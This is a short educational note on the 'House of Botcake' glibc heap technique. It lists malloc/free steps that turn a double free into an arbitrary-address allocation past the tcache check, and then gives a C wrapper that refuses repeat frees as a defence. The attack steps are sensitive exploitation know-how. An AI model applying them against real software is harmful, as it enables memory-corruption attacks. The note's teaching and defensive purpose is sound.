House of Botcake
Also works on glibc 2.27; bypasses the tcache double-free check.
- Result: makes malloc return an arbitrary address
- Requirement: a double free
Exploitation steps
Demonstrated with a request size of 0x100 (chunk size: 0x110):
- listTrash = malloc(0x100) * 7
- prev = malloc(0x100)
- a = malloc(0x100) # the victim
- malloc(0x10) # padding
- free(listTrash[i]) for i in [0,7) # fill up tcachebin
- free(a) # free a; a goes into the unsortedbin
- free(prev) # prev consolidates with a
- malloc(0x100); # get one chunk from tcache
- free(a) # free victim again, now it is also in tcachebin
- malloc(0x120) # use the overlap to obtain the chunk produced by merging prev and victim
- overwrite victim's fd
- malloc(0x100) # BOOM!
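From a defender's side, the reason the sequence above slips past glibc is that the tcache double-free check reads a key field stored inside the freed chunk, and that field is clobbered once the chunk has been through the unsortedbin and a consolidation. The added example below (not from this note or from how2heap; `tracked_malloc`, `tracked_free` and the shadow table are assumptions of the example) keeps the liveness state outside the heap, so the second free of the victim is refused regardless of which bin it went through:

```c
/* Added example: a shadow-table wrapper around malloc/free that refuses a
 * second free of the same pointer. Its state lives outside the heap, so
 * nothing the allocator writes into a chunk (fd/bk, tcache key) affects it. */
#include <stdio.h>
#include <stdlib.h>

#define MAX_LIVE 64

static void *live[MAX_LIVE];   /* user pointers currently allocated */
static size_t n_live = 0;

/* malloc wrapper: records the returned pointer in the shadow table. */
void *tracked_malloc(size_t size)
{
    void *p = malloc(size);
    if (p == NULL || n_live >= MAX_LIVE) { free(p); return NULL; }
    live[n_live++] = p;
    return p;
}

/* free wrapper: returns 0 on success, -1 if the pointer is not currently
 * live (a double free, or a pointer this wrapper never handed out). */
int tracked_free(void *p)
{
    for (size_t i = 0; i < n_live; i++) {
        if (live[i] == p) {
            live[i] = live[--n_live];   /* swap-remove from the table */
            free(p);
            return 0;
        }
    }
    return -1;   /* refused: the underlying free() is never reached */
}

/* Walks the same allocation/free shape as the note (7 chunks to fill the
 * tcachebin, victim freed, neighbour freed, one chunk taken back) and then
 * attempts the second free of the victim. Returns 1 if it was rejected. */
int double_free_is_rejected(void)
{
    void *trash[7], *prev, *victim;
    for (int i = 0; i < 7; i++) trash[i] = tracked_malloc(0x100);
    prev = tracked_malloc(0x100);
    victim = tracked_malloc(0x100);
    tracked_malloc(0x10);                       /* padding, intentionally kept */
    for (int i = 0; i < 7; i++) tracked_free(trash[i]);
    tracked_free(victim);                       /* first free: accepted */
    tracked_free(prev);
    tracked_malloc(0x100);
    return tracked_free(victim) == -1;          /* second free: refused */
}
```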
References
https://github.com/shellphish/how2heap/blob/master/glibc_2.31/house_of_botcake.c